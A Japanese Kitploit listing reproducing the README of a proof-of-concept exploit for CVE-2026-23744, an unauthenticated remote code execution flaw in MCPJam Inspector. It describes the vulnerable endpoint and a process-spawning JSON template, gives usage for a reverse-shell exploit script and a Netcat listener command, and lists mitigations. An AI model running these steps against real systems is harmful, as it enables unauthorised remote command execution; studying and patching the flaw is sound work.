Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2026-23744 — CVE-2026-23744 の PoC エクスプロイト。MCPJam Inspector の認証不要の RCE 脆弱性です。脆弱な API エンドポイントを介してリバースシェルとコマンド実行を提供します。 | Kitploit
ツール/GitHubGitHub/rohit-sundar/cve-2026-23744
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール学習と教育リモートアクセスツールラボと実践
GitHubrohit-sundar/cve-2026-23744

cve-2026-23744

CVE-2026-23744 の PoC エクスプロイト。MCPJam Inspector の認証不要の RCE 脆弱性です。脆弱な API エンドポイントを介してリバースシェルとコマンド実行を提供します。

1ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

CVE-2026-23744 – MCPJam Inspector の未認証リモートコード実行 (RCE)

説明

  • 製品: MCPJam Inspector
  • 影響を受けるバージョン: ≤ 1.4.2
  • 修正バージョン: 1.4.3
  • タイプ: 未認証リモートコード実行 (RCE)
  • 攻撃ベクトル: ネットワーク
  • 必要な認証: なし
  • 必要なユーザー操作: なし
  • CVSS v3.1: 9.8 (Critical)

CVE-2026-23744 は、MCPJam Inspector ≤ 1.4.2 に影響する重大な未認証リモートコード実行 (RCE) の脆弱性です。この問題は、Inspector がユーザー制御の MCP サーバー設定を受け入れ、適切な認証やセキュリティ制限なしにプロセス実行をトリガーできる管理エンドポイント (/api/mcp/connect) を公開しているために発生します。影響を受けるバージョンは、デフォルトで localhost ではなく 0.0.0.0 (すべてのインターフェース) をリッスンするため、サービスがネットワークからアクセス可能な場合、リモートからの悪用が可能です。

技術的詳細

脆弱性は以下のエンドポイントに関連しています:

root@kitploit:~
POST /api/mcp/connect

このエンドポイントは、サーバー設定を含む JSON オブジェクトを受け入れます。例:

root@kitploit:~
{
  "serverConfig": {
    "command": "<実行可能ファイル>",
    "args": ["<引数>"],
    "env": {}
  },
  "serverId": "<識別子>"
}

この提供された設定は、MCPJam Inspector によって新しい MCP サーバープロセスを作成および管理するために使用されます。エンドポイントは十分な認証とセキュリティ制御を欠いているため、攻撃者は Inspector サービスによって実行される任意のプロセス定義を送信できます。

基本的に、この脆弱性は重要な機能に対する認証欠如 (CWE-306) の問題であり、信頼されたローカルユーザー向けの機能をネットワーク経由でアクセス可能にし、適切なセキュリティチェックなしに公開しています。

根本原因

脆弱性は2つの設計上の欠陥から生じています:

  1. プロセス管理への未認証アクセス
    • API はユーザーが MCP サーバーの起動方法を定義できるようにします。
    • 重要な機能は認証なしでアクセス可能です。
    • ユーザー制御のプロセスパラメータは、それ以上の検証なしにアプリケーションによって信頼されます。
  2. 安全でないデフォルトの露出
    • MCPJam Inspector はデフォルトで 0.0.0.0 をリッスンします。
    • 管理 API はネットワーク上の他のシステムから到達可能です。
    • 攻撃者はプロセス作成機能と直接リモートで対話できます。

結果として生じる攻撃経路は次のように視覚化できます:

root@kitploit:~
攻撃者 → /api/mcp/connect → プロセス作成 → オペレーティングシステム

アプリケーションはオペレーティングシステムのプロセス作成と直接やり取りするため、悪用に成功すると、MCPJam Inspector サービスのセキュリティコンテキスト内で任意のコマンド実行が発生する可能性があります。

使用方法

root@kitploit:~
python3 exploit.py -t <ターゲットURL> -tport <ターゲットポート> -lhost <ローカルIP> -lport <ポート>
  • -t (または) --target: ターゲットURLまたはターゲットIPアドレス。
  • -tport (または) --target-port: 接続先のターゲットポート。ほとんどの場合 MCPJam Inspector では 6274 です。MCPJam Inspector がサブドメインや仮想ホストなど別の場所でホストされている場合は、この引数を使用しないでください。代わりに -t 引数を使用してサブドメインまたは仮想ホストを指定してください。
  • -lhost (または) --local-host: リバースシェルが接続を戻すためのパブリックIPアドレス。
  • -lport (または) --local-port: リバースシェルに使用するポート。
root@kitploit:~
python3 exploit.py -t <ターゲットURL> -tport <ターゲットポート> -lhost <ローカルIP> -lport <ポート> -c '<コマンド>'
  • -c (または) --command: ターゲット上で実行するコマンド。

このプログラムを使用する前に、まずローカルマシンで Netcat を使用してリスナーを起動する必要があります。

これを行うには、次のコマンドを使用します:

root@kitploit:~
nc -lvnp <ポート>

次に、上記のコマンドを実行してターゲット上でリバースシェルを取得します。

影響

悪用に成功すると、攻撃者は以下を行う可能性があります:

  • ターゲットホスト上で任意のコマンドを実行する、
  • 機密ファイルを読み取る、または変更する、
  • 永続化メカニズムをインストールする、
  • 追加のマルウェアやツールを展開する、
  • 環境内の他のシステムにピボットする、
  • サービスの権限によっては、完全なシステム侵害に至る可能性があります。

この脆弱性は、ネットワークベースの攻撃ベクトル、認証の欠如、ユーザー操作の不在、および機密性、完全性、可用性への高い影響により、CVSS v3.1 スコア 9.8 (Critical) が割り当てられています。

緩和策

直ちに MCPJam Inspector 1.4.3 以降にアップグレードしてください。追加の防御策は以下の通りです:

  • Inspector インターフェースへのアクセスを制限する、
  • 可能な限りサービスを localhost にバインドする、
  • ファイアウォールルールによる露出を制限する、
  • サービスを必要最小限の権限で実行する、
  • 不正なアクセス試行を監視する。

免責事項

この PoC は、教育、防御的なセキュリティ研究、および許可されたセキュリティテストのためのみです。明示的な許可を得たシステムに対してのみ使用する必要があります。許可なく第三者システムに対して使用すると、該当する法律や規制に違反する可能性があります。このリポジトリの所有者は、このプログラムの使用によって生じたいかなる損害についても責任を負いません。

ソース

  1. MITRE CVE Record – CVE-2026-23744
  2. NIST National Vulnerability Database (NVD) – CVE-2026-23744
  3. GitHub Security Advisory (GHSA-232v-j27c-5pp6)
  4. CVE-2026-23744 – Vulnerability Lookup
  5. CVE-2026-23744: Critical RCE in MCPJam Inspector Targeting Developers – CrowdSec
  6. CVE-2026-23744: MCPJam Inspector RCE Vulnerability – SentinelOne
ツールをダウンロード